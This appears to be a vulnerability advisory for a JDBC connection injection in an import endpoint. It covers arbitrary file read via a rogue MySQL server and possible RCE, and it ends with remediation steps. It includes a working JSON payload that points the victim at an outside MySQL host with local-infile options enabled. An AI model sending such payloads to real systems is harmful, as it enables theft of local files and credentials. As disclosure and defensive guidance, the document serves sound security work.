### Key Information Summary #### Vulnerability Type - **JDBC Connection Injection** #### Description - In the `importChanel` endpoint of `ImportDataController`, the application accepts user-controlled `DataSourceSqlParams` objects. - The user-controlled `driverClassName` and `url` parameters are directly used by `DriverManagerDataSource` to establish a database connection. - Due to the lack of validation on JDBC URL and driver class name, attackers can exploit this vulnerability to: 1. **Arbitrary File Read**: By specifying the MySQL driver and connecting to an attacker-controlled "malicious MySQL Server", attackers can leverage the `LOAD DATA LOCAL INFILE` feature in the MySQL protocol to request the client to read and upload arbitrary local files, such as `/etc/passwd` or `C:/Windows/win.ini`. 2. **Remote Code Execution (RCE)**: If H2 database, SQLite, or MySQL drivers vulnerable to deserialization are present in the classpath, attackers can craft specific JDBC URLs (e.g., H2's `RUNSCRIPT` command) to execute system commands. #### Impact - **Confidentiality Loss**: Attackers can read sensitive configuration files, source code, system files, and credential files, leading to exposure of core secrets. - **Integrity Loss**: In the presence of H2, SQLite, or specific deserialization gadget chains, the attack can escalate to RCE, enabling file system modification, backdoor implantation, or tampering with database records. - **Availability Loss**: Attackers can exhaust service resources via RCE or repeated malicious connections, leading to service shutdown or deletion of critical data. #### Proof of Concept - Requires running a malicious Python script to simulate a MySQL server, instructing the victim system to read the file `C:/windows/win.ini`. - Sample HTTP POST request and JSON payload: ```json { "driverClassName": "com.mysql.cj.jdbc.Driver", "url": "jdbc:mysql://1.2.3.4:3306/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true", "username": "any_user", "password": "any_password", "sql": "select 1" } ``` - Successfully verified arbitrary file read vulnerability. #### Remediation Measures - **Prohibit User-Controlled Driver Classes**: Do not accept user-supplied `driverClassName`; hardcode allowed driver class names in backend logic. - **Remove Full URL Control**: Instead of using the raw `url` string, accept `host`, `port`, and `database` separately, and construct the JDBC URL on the backend. - **Implement Parameter Whitelisting**: Strictly validate or remove dangerous parameters (e.g., `allowLoadLocalInfile`, `autoDeserialize`, `INIT`) when building the URL. - **Principle of Least Privilege**: Ensure the system user running the Java application has no filesystem access permissions to sensitive directories.